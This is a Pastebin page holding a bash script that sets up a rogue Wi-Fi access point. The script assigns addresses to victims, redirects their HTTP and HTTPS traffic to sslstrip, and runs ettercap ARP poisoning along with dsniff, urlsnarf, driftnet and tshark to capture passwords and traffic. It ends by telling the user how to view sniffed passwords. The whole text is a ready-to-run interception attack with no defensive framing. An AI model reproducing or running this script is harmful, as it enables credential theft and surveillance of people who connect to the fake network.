Advertisement
Guest User

Rogue Ap w/ MITM SSL Sniffing

a guest
May 2nd, 2010
667
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
  1. #!/bin/bash
  2. LOGDIR="$(date +%F-%H%M)"
  3. mkdir $LOGDIR
  4. cd $LOGDIR
  5. killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail
  6.  
  7. echo 'Network Interfaces:'
  8. ifconfig | grep Link
  9. echo -n "Enter the name of the interface connected to the internet, for example eth0: "
  10. read -e IFACE
  11. airmon-ng
  12. echo -n "Enter your wireless interface name, for example wlan0: "
  13. read -e WIFACE
  14. echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
  15. read -e ESSID
  16. airmon-ng stop $WIFACE
  17. ifconfig $WIFACE down
  18. airmon-ng start $WIFACE
  19. ifconfig $WIFACE up
  20.  
  21. modprobe tun
  22.  
  23. #airbase-ng is going to create our fake AP with the SSID we specified
  24. airbase-ng -e $ESSID -P -C 30 -v mon0 > airbase.log &
  25. xterm -bg black -fg yellow -T Airbase-NG -e tail -f airbase.log &
  26.  
  27. sleep 10
  28.  
  29. echo Configuring interface created by airdrop-ng
  30. ifconfig at0 up
  31. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  32. ifconfig at0 mtu 1400
  33. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  34.  
  35. echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
  36. iptables --flush
  37. iptables --table nat --flush
  38. iptables --delete-chain
  39. iptables --table nat --delete-chain
  40. iptables -P FORWARD ACCEPT
  41. iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
  42. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  43. iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
  44.  
  45.  
  46. echo Creating a dhcpd.conf to assign addresses to clients that connect to us
  47. echo "default-lease-time 600;" > dhcpd.conf
  48. echo "max-lease-time 720;" >> dhcpd.conf
  49. echo "ddns-update-style none;" >> dhcpd.conf
  50. echo "authoritative;" >> dhcpd.conf
  51. echo "log-facility local7;" >> dhcpd.conf
  52. echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
  53. echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
  54. echo "option routers 10.0.0.1;" >> dhcpd.conf
  55. echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
  56. echo "}" >> dhcpd.conf
  57.  
  58. echo 'DHCP server starting on our airdrop-ng interface (at0)'
  59. dhcpd3 -f -cf dhcpd.conf at0 &
  60. echo "Launching DMESG"
  61. xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
  62. echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
  63. xterm -bg black -fg blue -e ettercap -T -q -p -l etterca.log -i at0 // // &
  64. sleep 8
  65.  
  66. echo 'Configuring ip forwarding'
  67. echo "1" > /proc/sys/net/ipv4/ip_forward
  68.  
  69. echo 'Launching various tools'
  70. sslstrip -a -k -f &
  71. driftnet -v -i at0 &
  72. xterm -bg black -fg green -e urlsnarf -i at0 &
  73. dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
  74. tshark -i at0 -w traffic.pcap &
  75.  
  76. echo 'Run "etterlog -p etterca.log" to view sniffed passwords.'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement